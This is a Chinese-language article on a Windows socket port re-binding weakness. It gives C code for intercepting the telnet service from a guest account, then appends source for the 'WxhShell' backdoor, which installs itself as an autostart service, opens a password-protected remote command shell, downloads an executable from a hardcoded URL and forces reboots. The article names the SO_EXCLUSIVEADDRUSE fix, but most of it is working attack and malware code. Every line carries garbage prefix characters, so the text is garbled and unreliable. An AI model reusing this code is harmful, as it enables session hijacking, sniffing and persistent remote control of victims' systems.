在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:
'<>pz<c s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
V_Wv(G0-\ {/XzIOO;b saddr.sin_family = AF_INET;
iW-w?!>|m ="d}:Jl saddr.sin_addr.s_addr = htonl(INADDR_ANY);
3)atqM)i MHI0>QsI bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
35B0L.R oq^#mJL 其实这当中存在在非常大的安全隐患,因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限如服务启动的端口上的,这是非常重大的一个安全隐患。
UXDd8OJL tP"C>#LO 这意味着什么?意味着可以进行如下的攻击:
!RFlv h.sH:]Z 1。一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包,如果是自己处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
c[3sg jU@qQ@| 2。一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求,但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接,钩子或低层的驱动技术(这些都需要具备管理员权限才能达到)
#J)sz,)( <^
@1wg 3。针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过SOCKET发送高权限的命令,到达入侵的目的。
(pREo/ T U;`N:~|p# 4.对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的,很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。
wta\C{{ ?Z.p.v 其实,MS自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
:JV=Kt Owo2DsT t 解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。
t*NZ@)> w;&J._J 下面就是一个简单的截听ms telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。
GXYmJ4wR 5T:e4U&
#include
HIk5Q'e k #include
ymrmvuh #include
#:3ca] k #include
=A$5~op% DWORD WINAPI ClientThread(LPVOID lpParam);
-iR}kP| int main()
O7g
?x3 {
<wW#Wnc ] WORD wVersionRequested;
!0zbWB9 DWORD ret;
l"W9uS;\T WSADATA wsaData;
}/4 AT BOOL val;
3PIZay SOCKADDR_IN saddr;
FF0N{bY SOCKADDR_IN scaddr;
p3&/F=T;) int err;
D\}^<HW SOCKET s;
K9njD#/ SOCKET sc;
po4seW! int caddsize;
Mi%i_T^i HANDLE mt;
P%8
Gaa= DWORD tid;
sG=D(n1 wVersionRequested = MAKEWORD( 2, 2 );
?w#V<3= err = WSAStartup( wVersionRequested, &wsaData );
^vn8s~# if ( err != 0 ) {
a:r8Jzr printf("error!WSAStartup failed!\n");
zq>pK_WG return -1;
~pO6C*" }
yH|[K=?S[ saddr.sin_family = AF_INET;
9E'fM P(l$5x]g, //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了
B5GT^DaT JF!JY( U, saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
Ew5(U`] saddr.sin_port = htons(23);
j1Fy'os"! if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
b|^g51v {
)e d5~ok printf("error!socket failed!\n");
'-oS=OrZ return -1;
:.e`w#$7 }
|]1-ck! val = TRUE;
]P;uQ! //SO_REUSEADDR选项就是可以实现端口重绑定的
|_"JyGR2 if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
>v7fR<(%s {
5^<X:1J$ printf("error!setsockopt failed!\n");
EiQX*v return -1;
9utiev~3 }
![h+R@_( //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
pM],-7UM //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽
'r~,~AI //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击
IFcxyp 8n+&tBq1 if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
L.ScC {
]VtVw^ ir ret=GetLastError();
%X7R_>.
printf("error!bind failed!\n");
Y~gDS^8 return -1;
d[E~}Dq3# }
}Qyuy~-&^ listen(s,2);
~P8 6=Vw while(1)
^,*ED Yz {
`Fnl<C< caddsize = sizeof(scaddr);
t2skg //接受连接请求
!~Gx@Ro sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
:)o 4fOJ8 if(sc!=INVALID_SOCKET)
O=~8+sa {
'n4Ro|kA mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
@ x_. if(mt==NULL)
*`2.WF@E) {
pRWEBd1U printf("Thread Creat Failed!\n");
nGQc;p5; break;
+Ysm6n ' }
_&V%idz!0 }
G&=4@pLY5 CloseHandle(mt);
,)/gy)~# }
(3cJ8o>& closesocket(s);
hgIqr^N9 WSACleanup();
H'KCIqo
return 0;
P 4Vi~zMX
}
<7'`N\a DWORD WINAPI ClientThread(LPVOID lpParam)
a%| I'r {
FvYgp bEZ SOCKET ss = (SOCKET)lpParam;
|osu4=s| SOCKET sc;
XJg8-)T# unsigned char buf[4096];
rPhx^
QKH2 SOCKADDR_IN saddr;
PD #9Z=Hj long num;
Dl=9<:6FW DWORD val;
=og>& K DWORD ret;
KaVNRS //如果是隐藏端口应用的话,可以在此处加一些判断
Vw-,G7v&E //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
s%M# saddr.sin_family = AF_INET;
< z':_, saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
` 9;0Y saddr.sin_port = htons(23);
NSe Huk if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
w`BY>Xft0 {
F1_s%& printf("error!socket failed!\n");
7~b=G return -1;
a8 X}r. }
e"}JHXs val = 100;
b a5,?FVI~ if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
o\/&05rp] {
NOY`1i ret = GetLastError();
k=]#)A(#C return -1;
-M]B;[^ }
$Lj~ge3# if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
>+,w2m@0 {
uqz HS>GM ret = GetLastError();
rU6F$I= return -1;
Cws;6i*=@ }
s!k7Wwj if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
\r
%y^G {
G^r`)ND printf("error!socket connect failed!\n");
PP*6nW8 closesocket(sc);
x[?N[>uw closesocket(ss);
[U5@m]>^ return -1;
JJ:p A_uX }
:1*q}R while(1)
5D]3I=kj {
I+oe{#:. //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。
iGq%|o> //如果是嗅探内容的话,可以再此处进行内容分析和记录
)Ehi8 //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。
vYFtw L` num = recv(ss,buf,4096,0);
9sP;s^#t7U if(num>0)
yv[3&E? send(sc,buf,num,0);
]& 8c
45c else if(num==0)
~];r{IU break;
'FNnFm num = recv(sc,buf,4096,0);
$-D}y: if(num>0)
Yg/g9$' send(ss,buf,num,0);
(rmOv\hG9V else if(num==0)
V0)bPcS/ break;
^C=dq(i=[ }
Vc[aNpE closesocket(ss);
r'J="^k{ closesocket(sc);
O]4v\~@-j return 0 ;
SND@#?hiO }
@V?T'@W7D Vu`5/QDq 1Clid\T,o ==========================================================
kzE<Y V`
T l$EF 下边附上一个代码,,WXhSHELL
LC1WVK/ zqHG2:MN" ==========================================================
OV
G|WC ^4b;rLfk@ #include "stdafx.h"
Iuyq!R4:7 ZUyS+60 #include <stdio.h>
z*a-=w0 #include <string.h>
z@g%9|U #include <windows.h>
&k@\k<2Ia #include <winsock2.h>
!>:SPt l #include <winsvc.h>
0
k.\o"y #include <urlmon.h>
Ucx"\/" oF0DprP@ #pragma comment (lib, "Ws2_32.lib")
hW!2C6 #pragma comment (lib, "urlmon.lib")
M7[GwA[Z
+ nTtE+~u #define MAX_USER 100 // 最大客户端连接数
bm*.*A] #define BUF_SOCK 200 // sock buffer
&6^ --cc #define KEY_BUFF 255 // 输入 buffer
oVTXn=cYDp E^iShe #define REBOOT 0 // 重启
2Z-[x9t #define SHUTDOWN 1 // 关机
"MvSF1 nt]'>eX_} #define DEF_PORT 5000 // 监听端口
DPlDuUOd f,|g|&C #define REG_LEN 16 // 注册表键长度
z`qb>Y"xf3 #define SVC_LEN 80 // NT服务名长度
Gx7bV}&PN eB&.keO
// 从dll定义API
"Xg~1)% typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
;^TSla+t+ typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
6b7c9n Z typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
y>#_LhTX- typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
X"jL 4tEAi4H|`@ // wxhshell配置信息
<~*[OwN struct WSCFG {
4VHWoN"U int ws_port; // 监听端口
~<.{z]*O char ws_passstr[REG_LEN]; // 口令
}4g$aTc int ws_autoins; // 安装标记, 1=yes 0=no
ih|;H:"^ char ws_regname[REG_LEN]; // 注册表键名
dB)-qL8,2 char ws_svcname[REG_LEN]; // 服务名
#bJp)&LO char ws_svcdisp[SVC_LEN]; // 服务显示名
q@G}Hjn char ws_svcdesc[SVC_LEN]; // 服务描述信息
bv;.6C(T< char ws_passmsg[SVC_LEN]; // 密码输入提示信息
eslvg#Q int ws_downexe; // 下载执行标记, 1=yes 0=no
Pl. y9g~ char ws_fileurl[SVC_LEN]; // 下载文件的 url, "
http://xxx/file.exe"
4ClSl#X#i char ws_filenam[SVC_LEN]; // 下载后保存的文件名
f}~=C2R1<! Q#X'.](1 };
p+pu_T;~ &mW7FR'( // default Wxhshell configuration
`W >Sss struct WSCFG wscfg={DEF_PORT,
Qgf\"s "xuhuanlingzhe",
E/hT/BOPK 1,
x=Aq5*A0 "Wxhshell",
&1f3e "Wxhshell",
9Trk&OB "WxhShell Service",
2z.~K&+x "Wrsky Windows CmdShell Service",
$|g
; "Please Input Your Password: ",
OkAgO3>Y/ 1,
Z4X, D`s "
http://www.wrsky.com/wxhshell.exe",
P:_bF>r ? "Wxhshell.exe"
ek. @ 0c };
.hM t:BMf* blWtC/!Aq; // 消息定义模块
S[gACEZ = char *msg_ws_copyright="\n\rWxhShell v1.0 (C)2005
http://www.wrsky.com\n\rMake by 虚幻灵者\n\r";
RH:vd|q+ char *msg_ws_prompt="\n\r? for help\n\r#>";
D66NF;7q char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reboot\n\rd shutdown\n\rs Shell\n\rx exit\n\rq Quit\n\r\n\rDownload:\n\r#>
http://.../server.exe\n\r";
$Mj\ 3 char *msg_ws_ext="\n\rExit.";
ar\K8mj char *msg_ws_end="\n\rQuit.";
-)B_o#2=2 char *msg_ws_boot="\n\rReboot...";
PqL.^ char *msg_ws_poff="\n\rShutdown...";
6D[]Jf,9 char *msg_ws_down="\n\rSave to ";
k0O5c[j (X
Oz0.W char *msg_ws_err="\n\rErr!";
^a`3)WBv8 char *msg_ws_ok="\n\rOK!";
|IV7g*J89 83I 5n&) char ExeFile[MAX_PATH];
~bm'i%$k int nUser = 0;
c|`$
h HANDLE handles[MAX_USER];
8!cHRtqK int OsIsNt;
b1cVAfUP i\l}M]Z# SERVICE_STATUS serviceStatus;
\y:48zd SERVICE_STATUS_HANDLE hServiceStatusHandle;
JB].ht ;@Fb>lBhX // 函数声明
;Vc|3 int Install(void);
09anQHa int Uninstall(void);
'2i !RT- int DownloadFile(char *sURL, SOCKET wsh);
cV0CI& int Boot(int flag);
jwAYlnQ^EM void HideProc(void);
$,]U~7S int GetOsVer(void);
!&hqj$>-} int Wxhshell(SOCKET wsl);
mB"I(>q*M void TalkWithClient(void *cs);
fglfnx0{ int CmdShell(SOCKET sock);
(DY[OIHI int StartFromService(void);
>(ip-R int StartWxhshell(LPSTR lpCmdLine);
,!@ MLn S}
OO) VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
CX{6 VOID WINAPI NTServiceHandler( DWORD fdwControl );
Q2- lHn^L: 5|*`} ;/y // 数据结构和表定义
<7F-WR/2n SERVICE_TABLE_ENTRY DispatchTable[] =
=WW5H\? {
wB[f%mHs
{wscfg.ws_svcname, NTServiceMain},
'!`\!=j-` {NULL, NULL}
1<73uR&b% };
oo2d, <A8>To< // 自我安装
-ycYQ~R int Install(void)
$8UW^#Bpq {
&`v?oN9$ char svExeFile[MAX_PATH];
+"<+JRI(M5 HKEY key;
HrvyI)4{ strcpy(svExeFile,ExeFile);
@QVg5 "W%YsN0 // 如果是win9x系统,修改注册表设为自启动
j\~,Gtn>Z if(!OsIsNt) {
>d
p/ if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
./k7""4 RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
=X7kADRq RegCloseKey(key);
G/Sp/I<d if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
4BCe;Q^6 RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
Oa~ThbX7 RegCloseKey(key);
2vjkThh`I return 0;
}#H,oy;Dz }
8R3{YJ6@T }
mXp#6'a }
X'PZCg W else {
S
\]O8#OX d7vPZ_j^z // 如果是NT以上系统,安装为系统服务
s{' Sl{-Eu SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
`hj,rF+4 if (schSCManager!=0)
yj&GJuNb~ {
cZ:jht SC_HANDLE schService = CreateService
(b f
IS (
+:;ddV schSCManager,
bp:`m>4< wscfg.ws_svcname,
dz([GP'-* wscfg.ws_svcdisp,
. &j+& SERVICE_ALL_ACCESS,
)&j`5sSXcr SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
=eQB-Xe8Y SERVICE_AUTO_START,
N:| :L:<1 SERVICE_ERROR_NORMAL,
~ h3G}EH svExeFile,
?<!qF:r: NULL,
W^L^7 NULL,
/_qq(,3 NULL,
bKCE;Wu:G NULL,
;F"!$Z/ NULL
MIIl+ );
y ;[~(Yg[ if (schService!=0)
js81@WX!c {
H
u;"TG CloseServiceHandle(schService);
G9Uc
}z CloseServiceHandle(schSCManager);
05FGfnq.8 strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
W7!gD strcat(svExeFile,wscfg.ws_svcname);
Jh
E C if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
,]2?S5R RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
uxU-N RegCloseKey(key);
/fp8tL2Y return 0;
3E|||3rf }
fI)XV7,X }
CwX?%$S
CloseServiceHandle(schSCManager);
1PwtzH.w }
7<^+)DsS? }
2 L4[~> \yJ
4+vo2Q return 1;
DPzW,aIgv }
)sm9%|.& ISpV={$Zd // 自我卸载
y5j:+2|I int Uninstall(void)
:.*Q@X}-I {
CXrOb+ HKEY key;
c6xr[tc% cpa" ,8 if(!OsIsNt) {
9<_hb1' if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
IEy$2f>Ns RegDeleteValue(key,wscfg.ws_regname);
gLv+L]BnhH RegCloseKey(key);
aA|{r/.10K if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
%[p*6&V RegDeleteValue(key,wscfg.ws_regname);
`}),wBq RegCloseKey(key);
zVS{X=u return 0;
g9pKoi|\E }
<\^o }
*m"9F'(Sd }
9xK>fM&u else {
@n)?=[p Z5q%L!4G SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
~JL
qh if (schSCManager!=0)
_VT{2`|}) {
5qnei\~ SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
}gv'r
"; if (schService!=0)
9!n:hhJM {
0vqH-)} if(DeleteService(schService)!=0) {
B46:LQ9[ CloseServiceHandle(schService);
Z2]0brV CloseServiceHandle(schSCManager);
mKe6rEUs| return 0;
arm_SyL0 }
gtuSJ+up CloseServiceHandle(schService);
n{4iW_/D }
CB#2XS>V CloseServiceHandle(schSCManager);
^&YtZjV }
K:U=Y$ x }
b;QgL_w 8`*5[ L~~/ return 1;
$Lstq_x+ }
ejV`W7U 0cHcBxdF // 从指定url下载文件
Eg`~mE+a int DownloadFile(char *sURL, SOCKET wsh)
M$EF 8 {
UmVn: a HRESULT hr;
<9pI~\@w char seps[]= "/";
IE \RP! char *token;
@H?OHpJ"` char *file;
K` N$nOw char myURL[MAX_PATH];
@sn:%/x _ char myFILE[MAX_PATH];
"Y+VNS `?$-T5Rr strcpy(myURL,sURL);
QgU]3`z" token=strtok(myURL,seps);
W@AHE?s6g while(token!=NULL)
w@-G_-6W {
@JlT*:Dz file=token;
)isS^O$qH token=strtok(NULL,seps);
uY~mi9E }
/9ORVV IMD^(k 2 GetCurrentDirectory(MAX_PATH,myFILE);
hFA |(l6 strcat(myFILE, "\\");
961&rR}d strcat(myFILE, file);
zRjbEL send(wsh,myFILE,strlen(myFILE),0);
{1)b LG|$ send(wsh,"...",3,0);
VDnrm* hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
e2=}qE7 if(hr==S_OK)
WDY\Fj return 0;
c_qox else
*x8~}/[T(F return 1;
\/1~5mQ+ |gA@$1+} }
$CB&>?~ esSj
3E // 系统电源模块
e Fs5l int Boot(int flag)
(Yj6|` {
mdL T7 HANDLE hToken;
,$Fh^KNo] TOKEN_PRIVILEGES tkp;
3)VO{Cj! x}a?B if(OsIsNt) {
%t_'rv OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
eM$a~4!d LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
8i"CU:( tkp.PrivilegeCount = 1;
Ds]
.Ae tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
G--vwvL AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
?T73BL= if(flag==REBOOT) {
?:vg`m!* if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
g s1 return 0;
|6-9vU!LK? }
60~*$` else {
K_U`T;Z\ if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
.nIGs'P return 0;
Q']'KU. }
E7h@c>IK }
=z5=? else {
BpA7
z / if(flag==REBOOT) {
KD#zsL)3 if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
>;G_o="X return 0;
N/-(~r[ }
CPa+?__B else {
a. u{b&+9 if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0))
~jKIuO/ return 0;
TH4f"h+B3" }
B_Wig2xH0 }
ShRMzU OtL~NTY return 1;
7y&